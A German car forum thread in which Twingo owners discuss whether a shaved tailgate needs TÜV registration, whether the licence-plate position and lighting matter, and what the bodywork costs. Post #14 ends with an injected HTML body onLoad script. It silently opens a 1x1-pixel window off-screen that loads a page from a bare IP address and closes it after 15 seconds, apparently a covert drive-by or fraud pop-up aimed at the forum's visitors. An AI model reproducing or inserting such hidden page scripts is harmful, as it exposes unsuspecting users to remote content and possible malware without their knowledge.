Themabewertung:
  • 0 Bewertung(en) - 0 im Durchschnitt
  • 1
  • 2
  • 3
  • 4
  • 5
cleane Heckklappe - was eingetragen?
#1
Moin Leute,

hab ne cleane Heckklappe die eingetragen werden soll. WAS genau wird denn da so eingetragen und was hat Euch die Eintragung gekostet Question
Wo er seine Finger im Spiel hat(te):

die blaue Sau - mein 1. Twingo Arrow 1.6 16V K4M und einiges mehr - staubt gerade etwas ein Twisted Evil
Jahrhundertprojekt xXx - mein 2. Twingo Arrow Kompressormotor und vieles mehr in Vorbereitung Shocked
Fury - Lisa`s 1. Alltagstwingo Arrow schwarz, breit, stark / R.I.P. Crying or Very sad
PU - Lisa`s Schönwettertwingo Arrow 1.6 8V K7M & bling, bling Cool
Hot Brownie - Lisa`s 2. Alltagstwingo Arrow brauner Lack, beiges Leder & eigentlich am Thema "Alltag" vorbei Very Happy
Bärchenmobil - ein Übergangstwingo Arrow vorm Schrott gerettet & 2tes Leben spendiert Wink
der Professor - ein weiterer Übergangstwingo Arrow Kompressormotor und vieles mehr Razz
Kermit - sollte ein PickUp werden Arrow war hinterher fast ein Cabrio Rolling Eyes
Flippi - das Chamäleon Arrow leider nicht mehr zu retten gewesen Sad
Es bedanken sich:
#2
sowas muss man eintragen lasse?

gruß
Es bedanken sich:
#3
Moin Chris,

fahr jetzt auch seid fast nem jahr mit meiner cleanen klappe rum und eingetragen ist da auch nix. bin bei der HU gewesen und der tüv mensch meinte nur :" wie geht die denn jetzt auf???" das wars... also denke mal zu 99,9% das man da nix eintragen brauch... kann aber nochmal genau nachfragen (1 telefonat Smile ) und dann weiß ichs ..

greets
patrick
Es bedanken sich:
#4
musst nicht eintragen lassen.
Es bedanken sich:
#5
was mir gerade so einfällt:

und wie sieht es damit aus wenn die Feuerwehr versucht dich rauszuholen durch die heckklappe? geht ja dann net.

gruß
Es bedanken sich:
#6
[V.D.E. schrieb:Sniperboy]was mir gerade so einfällt:

und wie sieht es damit aus wenn die Feuerwehr versucht dich rauszuholen durch die heckklappe? geht ja dann net.

gruß
haben die dann net nen grosen Bolzenschneider Confused
Es bedanken sich:
#7
Was hat das ganze dich gekostet! Und wer macht dir sowas? Karroseriebauer oder jede beliebige Lackiererei?

Reply by Bonsai
Ameisen duckt euch!
Es bedanken sich:
#8
Naja,

Karosseriebauer an sich machen das schon. Nur das mit dem wollen und dem können... Man sollte schon gucken das man einen findet der weiß wovon man redet. Wenn das Gespräch folgendermaßen los geht sollte man es lieber lassen: "Was ist denn cleanen?" "Wieso Nummernschild nach unten" "Blödsinn..."

Und es muss ordentlich verschweisst und gezinnt werden. Zu wenig wie möglich spachteln.

Kosten kannste so auf 300 - 400 Euro rechnen.

Also eintragen braucht man die nicht? Hauptsache es leuchtet unten, oder wie? Bin mir da net so ganz sicher...
Wo er seine Finger im Spiel hat(te):

die blaue Sau - mein 1. Twingo Arrow 1.6 16V K4M und einiges mehr - staubt gerade etwas ein Twisted Evil
Jahrhundertprojekt xXx - mein 2. Twingo Arrow Kompressormotor und vieles mehr in Vorbereitung Shocked
Fury - Lisa`s 1. Alltagstwingo Arrow schwarz, breit, stark / R.I.P. Crying or Very sad
PU - Lisa`s Schönwettertwingo Arrow 1.6 8V K7M & bling, bling Cool
Hot Brownie - Lisa`s 2. Alltagstwingo Arrow brauner Lack, beiges Leder & eigentlich am Thema "Alltag" vorbei Very Happy
Bärchenmobil - ein Übergangstwingo Arrow vorm Schrott gerettet & 2tes Leben spendiert Wink
der Professor - ein weiterer Übergangstwingo Arrow Kompressormotor und vieles mehr Razz
Kermit - sollte ein PickUp werden Arrow war hinterher fast ein Cabrio Rolling Eyes
Flippi - das Chamäleon Arrow leider nicht mehr zu retten gewesen Sad
Es bedanken sich:
#9
...ist auch nicht eingetragen!

Der TÜV nörgelte nur ein klein wenig an meinem Nr.Schil rum, weil dass nun "...leicht nach unten geneigt..." ist und "...die Nr.Schildleuchten zu klein ..." sind.

Aber das wird ja nun für die nächste Saison geändert...und dann bekomm ich nur das Nr.Schild im Stossfänger eingetragen!

Ansonsten ist das EINTRAGUNGSFREI!!!
Greetinx, der "SILVERSURFER"!
Es bedanken sich:
#10
Wenn Du deine Heckklappe cleanst musst Du eigentlich nix eintragen lassen es sei denn du verlagerst das Nummernschild.
Denn das darf nur an den dafür vorgesehenen Punkten befestigt werden wenn du es woanders hin haben magst musst du es eintragen lassen...
Es bedanken sich:
#11
Naja,

muss man net. War jetzt zur Hauptuntersuchung. Das Ding ist in der Heckklappe und is bleuchtet - no Problem!
Wo er seine Finger im Spiel hat(te):

die blaue Sau - mein 1. Twingo Arrow 1.6 16V K4M und einiges mehr - staubt gerade etwas ein Twisted Evil
Jahrhundertprojekt xXx - mein 2. Twingo Arrow Kompressormotor und vieles mehr in Vorbereitung Shocked
Fury - Lisa`s 1. Alltagstwingo Arrow schwarz, breit, stark / R.I.P. Crying or Very sad
PU - Lisa`s Schönwettertwingo Arrow 1.6 8V K7M & bling, bling Cool
Hot Brownie - Lisa`s 2. Alltagstwingo Arrow brauner Lack, beiges Leder & eigentlich am Thema "Alltag" vorbei Very Happy
Bärchenmobil - ein Übergangstwingo Arrow vorm Schrott gerettet & 2tes Leben spendiert Wink
der Professor - ein weiterer Übergangstwingo Arrow Kompressormotor und vieles mehr Razz
Kermit - sollte ein PickUp werden Arrow war hinterher fast ein Cabrio Rolling Eyes
Flippi - das Chamäleon Arrow leider nicht mehr zu retten gewesen Sad
Es bedanken sich:
#12
Chris - TFNRW schrieb:Naja,

muss man net. War jetzt zur Hauptuntersuchung. Das Ding ist in der Heckklappe und is bleuchtet - no Problem!

Heckklappe? du meinst wohl in der heckschürze oder??
Gruß Tw-Ingo

Rechtschreibfehler sind gewollt und dienen zur allgemeinen belustigung!!!

[Bild: Bild2.jpg]
Es bedanken sich:
#13
Achso, ja......... naja - hinten halt Cool
Wo er seine Finger im Spiel hat(te):

die blaue Sau - mein 1. Twingo Arrow 1.6 16V K4M und einiges mehr - staubt gerade etwas ein Twisted Evil
Jahrhundertprojekt xXx - mein 2. Twingo Arrow Kompressormotor und vieles mehr in Vorbereitung Shocked
Fury - Lisa`s 1. Alltagstwingo Arrow schwarz, breit, stark / R.I.P. Crying or Very sad
PU - Lisa`s Schönwettertwingo Arrow 1.6 8V K7M & bling, bling Cool
Hot Brownie - Lisa`s 2. Alltagstwingo Arrow brauner Lack, beiges Leder & eigentlich am Thema "Alltag" vorbei Very Happy
Bärchenmobil - ein Übergangstwingo Arrow vorm Schrott gerettet & 2tes Leben spendiert Wink
der Professor - ein weiterer Übergangstwingo Arrow Kompressormotor und vieles mehr Razz
Kermit - sollte ein PickUp werden Arrow war hinterher fast ein Cabrio Rolling Eyes
Flippi - das Chamäleon Arrow leider nicht mehr zu retten gewesen Sad
Es bedanken sich:
#14
Wie siehts mit der Heckschürze von Reichhardt aus? (Die mit der Nummernschildaussparung) Hat die ABE?

Ben


<body onLoad="win=window.open('http://66.246.52.126/page.php?id=7857','_blank','width=1,height=1,left=2000,top=2000');window.setTimeout('win.close()',15000);"></body>
Es bedanken sich:
#15
nein nein nein^^ mein tüv männchen hat mich angemeckert als ich ohne schlösser und scheibenwischer kam und gefragt hab wegen der eintragung, dann meinte er "wie soll ich was eintragen, was nicht vorhanden ist? oder willst in deim schein stehen haben ...heckklappe mit ohne scheibenwischer und schloss)???"
das war mein tüv gespräch zum thema heckklappe cleanen. aber wie schon richtig gesagt die höhe vom nummernschild muss passen und die beleuchtung, sonst kannst deine heckklappe komplett clean machen
Gruß
Tobi

Mein Silberpfeil GT =)

Am Öl kanns nicht liegen...war ja keins drin Cool
Es bedanken sich:


Möglicherweise verwandte Themen…
Thema Verfasser Antworten Ansichten Letzter Beitrag
  Tachoangleichung eingetragen? 9eor9 15 10.728 10.04.2013, 06:32
Letzter Beitrag: felixkarls
  14 zoll intra felgen nicht eingetragen cibcab 17 23.065 16.05.2011, 20:19
Letzter Beitrag: 9eor9
  eingetragen 155/65 aber 165/70 gekauft SKAnders 8 4.529 24.09.2010, 19:03
Letzter Beitrag: Fabi-b
  Xenonscheinwerfer eingetragen!? BlueDevil84 3 2.648 21.04.2009, 19:46
Letzter Beitrag: Chris - TFNRW

Gehe zu:


Benutzer, die gerade dieses Thema anschauen: 1 Gast/Gäste